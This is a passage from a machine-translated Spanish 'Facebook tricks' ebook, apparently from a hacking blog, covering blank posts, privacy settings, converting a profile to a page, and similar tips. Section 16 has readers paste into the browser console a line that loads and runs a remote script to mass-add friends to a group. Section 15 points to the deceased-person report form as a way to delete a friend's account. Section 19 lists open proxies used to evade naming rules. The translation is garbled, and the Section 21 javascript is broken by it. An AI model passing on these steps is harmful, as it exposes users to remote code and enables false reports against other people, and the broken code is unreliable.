PASO 2)Prensa "alt+0173″ (del teclado numérico sin comillas)

PASO 3)haga clic en "Cuota” o PresioneIngresar… Y eso es..

una vez que haya terminado, su publicación en blanco se mostrará en el muro de su amigo.

Nota:- Funciona solo con estado y comentarios.

Ahora juega, sorprende a tus amigos y diviértete...;-)

Derechos de autorwww.cyber-worldd.blogspot.in
71

Sección 10 –Cómo mostrar quién está en línea en


Facebook cuando está en modo sin conexión: -

Primero irá al inicio de sesión de Facebook después de que pueda ir al chat fuera de línea en la cuenta de
Facebook. Irhttp://www.facebook.com/onlinenow página.

Haga clic enPermitir

Después de instalar esta aplicación, puede mostrar quién está en línea en Facebook mientras está desconectado en la
cuenta de Facebook

Derechos de autorwww.cyber-worldd.blogspot.in
72

Sección 11 –Cómo deshabilitar la búsqueda


pública de su perfil de Facebook: -

Inicie sesión en Facebook.com y luego vaya a Cuenta>La configuración de privacidad

Haga clic en Editar su configuración enAplicaciones y sitios webEn la parte inferior, busque Búsqueda pública

Derechos de autorwww.cyber-worldd.blogspot.in
73

Sección 12 –Cómo encontrar si alguien


pirateó su cuenta de Facebook: -

Iniciar sesión Facebook Haga clic enConfiguraciones de la cuenta.

Por debajoPestaña de seguridad, puede ver toda su información de inicio de sesión.

Derechos de autorwww.cyber-worldd.blogspot.in
74

Sección 13 –Cómo rastrear las actividades de FB: -

www.veintepies.com

Derechos de autorwww.cyber-worldd.blogspot.in
75

Sección 14: cómo cambiar las actualizaciones de

estado de FB: -

www.fliptext.org

Derechos de autorwww.cyber-worldd.blogspot.in
76

Sección 15 –Cómo eliminar la cuenta de


Facebook de tus amigos en 24 horas: -

http://www.facebook.com/help/contact.php?show_form=fallecido

Derechos de autorwww.cyber-worldd.blogspot.in
77

Sección 16: agregue todos los amigos de FB en


grupos de FB con un solo clic: -

Si desea agregar a todos sus amigos en el grupo con un solo clic, siga todos los pasos
cuidadosamente.

Primero abre Mozilla Firefox

Ahora abre tu grupo de Facebook en el que quieres agregar a tus amigos

Luego haga clic en Ctrl + Shift + K

Ahora Pegar...

document.body.appendChild(document.createElement('script')).src='http://
groupinvites.googlecode.com/files/group-invite.js';

Luego presione Entrar

Luego, para ocultar el cuadro, presione nuevamente Ctrl + Shift + K

Derechos de autorwww.cyber-worldd.blogspot.in
78

Sección 17: convierta su imagen en códigos de


chat de FB: -

En primer lugarhaga clic aquí ahora la nueva ventana está abierta.

Ahora explore cualquier imagen desde su computadora.

Luego selecciona y sube tu foto.

Ahora toma unos segundos y luego su imagen se convertirá en códigos de chat.

Ahora copie los códigos que se muestran en el cuadro.

Luego pegue el código de copia en el cuadro de chat y listo.

Derechos de autorwww.cyber-worldd.blogspot.in
79

Sección 18 - Cómo convertir una cuenta personal de


FB a una página de FB: -

¿Qué sucederá si utiliza esta función para su


cuenta?
Sé que todos quieren que esté en la página de nombres con muchos fanáticos, pero ¿es útil esta opción para ti?
En primer lugar, debe comprender todo acerca de cómo funciona y cuáles serán sus resultados.

Si tu cuenta personal tiene muchos amigos y también demasiados suscriptores/seguidores. Luego, al migrar la cuenta a la
página, convierte su lista de todos los amigos y la lista de seguidores en la lista de fans de su nueva página.

Tomemos un ejemplo si tiene 5,000 amigos y 15,000 seguidores en la cuenta cuando la convierte. Tu página será de
20.000 fans. ¡Sí! puede verse bien, pero tiene muchos impactos después de la migración.

Antes de la migración, debe conocer muy bien estos resultados enumerados.

La migración solo convierte a tus amigos y seguidores en fans de la página.


Entonces toda la otra información será eliminada. Lo que incluye su información personal, mensajes, aplicaciones,
grupos de los que es propietario y también se unió, estado, fotos personales, fotos etiquetadas, videos compartidos,
etc. Todo lo relacionado o la cuenta requerida dejará de estar disponible. Lo único que quedará en su cuenta es la
página que creó.
Si cree que está en el lugar correcto para la conversión de la cuenta. Luego, antes de convertir la cuenta, debe
descargar la información de su cuenta. Para saber más sobre la descarga de información de la cuenta, le pido que
eche un vistazo a mi tema sobre

Descarga la información de tu cuenta de Facebook .

Este artículo anterior lo ayuda a guardar su información en su disco.

Pasos para convertir tu Cuenta en Fan Page.

Ahora aquí viene a la parte principal de este artículo que está esperando, si lee todos los resultados anteriores y
después de que realmente piensa en convertir su cuenta.

Derechos de autorwww.cyber-worldd.blogspot.in
80

Luego sigue todos los pasos con mucho cuidado.

En primer lugar, debe iniciar sesión en su cuenta que desea convertir. Luego configure el nombre de su
cuenta porque el nombre de su será el nombre de su página si desea cambiar, luego cámbielo antes de
migrar.

Cuando esté listo para convertir, vaya al centro de ayuda de Facebook y busque migrar
cuenta ovisitar aquí

En el centro de ayuda encontrará una aclaración completa sobre la migración y también proporcionan un enlace de
migración. Si no puede encontrar entoncesvisitar aquí

Esto abrirá la página de migración, se verá igual haciendo un nuevo formulario de página.

Luego seleccione la categoría de su página como negocio, marca o comunidad, etc. Después de seleccionar la
categoría, se les solicitará su contraseña si desea convertir o no.

En algún momento, también muestra este error que inicia sesión en su cuenta desde el dispositivo anterior que usó para iniciar sesión. Así
que no se preocupe, tomará de 24 a 48 horas debido a la seguridad de la cuenta después de este período de tiempo, puede migrar

Después de proporcionar la contraseña, su página se actualizará y comenzará a convertir su cuenta en una página y esperará unos minutos
para completar la conversión de todos los miembros.

Después de completar la conversión, su página está lista para usar. también puede disfrutar de su página desde una cuenta existente o también puede

crear su otra cuenta como administrador por correo electrónico agregando en el panel de administración.

Derechos de autorwww.cyber-worldd.blogspot.in
81

¿Esta migración es reversible?

No, esta migración no es reversible, por lo que si migra su cuenta accidentalmente con un nombre incorrecto u otra razón por
error. Entonces, lo siento, amigos, su cuenta ahora tiene un gran problema. Facebook ahora proporciona un formulario de solicitud
para apelar a que se revierta su página en la cuenta. Pero las posibilidades son del 10% solo para un resultado útil porque este
formulario requiere su prueba de identificación que también coincide con el nombre de su cuenta. Entonces, si puede
proporcionar, entonces puedeapelación aquí

Después de apelar, si su solicitud es aprobada porFacebook entonces podrá recuperar su cuenta.

Al final, siento que ahora todo este artículo aclara la imagen en tu mente y comprenderás toda la parte sin ninguna duda. Si
tiene algún problema con Facebook, puede preguntarme en cualquier momento. Me pondré en contacto contigo en cuanto
el tiempo me lo permita. Tampoco soy capaz de dar tiempo atrucos seguros para nuevas publicaciones debido a la carga de
estudios. Pero hago lo mejor que puedo.
Así que dé su opinión y no olvide compartir este artículo si lo encuentra útil porque sus esfuerzos son
necesarios para nosotros.

Derechos de autorwww.cyber-worldd.blogspot.in
82

Sección 19 - Cómo hacer una cuenta de FB con un


solo nombre: -

Este truco funciona para Mozilla Firefox, así que pruébalo en Mozilla.

En primer lugar, cambie el proxy de su navegador. Utilice manualmente uno de los proxy que se indican a continuación.

Proxy HTTP:-

119.235.16.41
114.6.15.154
112.215.10.74

PUERTO :- 8080

Luego guarde su configuración.

Ahora abra la configuración del nombre de su cuenta de Facebook.

Cambie su idioma de inglés (nosotros) abahasa indonesia Luego

simplemente elimine su apellido y guárdelo.

Ahora su cuenta de Facebook es solo con nombre sin apellido.

Después de completar todos los pasos, elimine el proxy manual y seleccione usar la configuración del
proxy del sistema y cambie su idioma a inglés (us)

Nota IMPORTANTE:-En primer lugar, abra la configuración de su cuenta de Facebook y luego cambie el proxy porque en algún momento

después de cambiar el proxy, habrá un error al iniciar sesión en la cuenta.

Derechos de autorwww.cyber-worldd.blogspot.in
83

Sección 20 - Insertar imagen de perfil en el cuadro de chat de


Facebook: -

Este truco está a punto de insertar la imagen de perfil de cualquier persona en el cuadro de chat. Estetruco ya está publicado anteriormente enNuevos

trucos de chat de Facebok pero muchos de mis amigos están confundidos acerca de este truco. porque no pueden encontrar el nombre de usuario y

la identificación del usuario

Ahora solo hay un método simple para aprender este truco, simplemente mire la imagen a continuación.

[[identificación única o nombre de usuario]]

Para encontrar el nombre de usuario o la identificación del usuario, simplemente eche un vistazo aquí

Paso 1.

Paso 2.

Derechos de autorwww.cyber-worldd.blogspot.in
84

Paso 3.

Espero que ahora se aclaren todas las dudas despues de esto..

Derechos de autorwww.cyber-worldd.blogspot.in
85

Sección 21 - Cómo editar la página de inicio de FB por


Javascript: -

Solo sigue estos sencillos pasos para este truco.

En primer lugar, abra su navegador web, le recomiendo que use Google Chrome.

Luego abra su sitio que desea editar como lo estoy haciendogramocon facebook

Luego pegue este JavaScript en la barra de direcciones

javascript:document.body.contentEditable='true'; documento.designMode='on'; vacío 0

Presiona enter

Derechos de autorwww.cyber-worldd.blogspot.in
86

Sección 22 – Cambia tu tema de


Facebook:-

Nota IMPORTANTE:-Este Truco es solo para Mozilla Firefox.

Abra Mozilla Firefox y luego instaleComplementos con estilo Haga clic aquí

Después de la instalación reinicia tu Firefox.

Luego inicie sesión en suFacebook Cuenta y luego haga clic enSbotón en Agregar una barra. Como se muestra en las siguientes imágenes.

Luego elija cualquier tema que desee. Luego haga clic en el botón Instalar.

Después de la instalación, abra suFacebook entonces verás un resultado increíble... Espero que te guste... :))

Derechos de autorwww.cyber-worldd.blogspot.in
87

Sección 23: inicie sesión en sus demasiadas cuentas de FB


con Google Chrome: -

Muchos pueblos tienen demasiadasFacebookpero abrir 3,4 o más cuentas al mismo tiempo es un gran
problema para muchas personas porque para iniciar sesión en sus muchas cuentas necesita diferentes
navegadores.
Pero al usar este truco, no es necesario descargar diferentes navegadores para usar Facebook porque Google Chrome tiene
la opción de agregar un nuevo usuario en el que puede navegar de manera diferente creando un nuevo navegador
diferente.

Siga estos sencillos pasos para agregar nuevos usuarios en Google Chrome

Primero descargue la última versión deGoogle Chrome.

Luego abre Google Chrome y ve aAjustes.

Luego haga clic enAgregar nuevos usuariosa opción de los usuarios.

Al usar la opción puede agregar muchos usuarios.

Derechos de autorwww.cyber-worldd.blogspot.in
88

Para obtener más artículos sobre piratería, visite:

www.computerexpertofindia.blogspot.in
www.cyber-worldd.blogpspot.com

Contáctame:[email protected] Agrégame
en Facebook : www.facebook.com/
AnuragAkaProgramm er

Dale me gusta a mi página oficial de FB:


www.facebook.com/ComputerExpertt

Gracias por leer !!


Saludo:
aakash kumar
Hackear el universo
Experto en computacion
Artículos de piratería

- - - - - - - - - - - - - - - - - - - Despedida – Anurag l D@rk d3ViL-----------------

También podría gustarte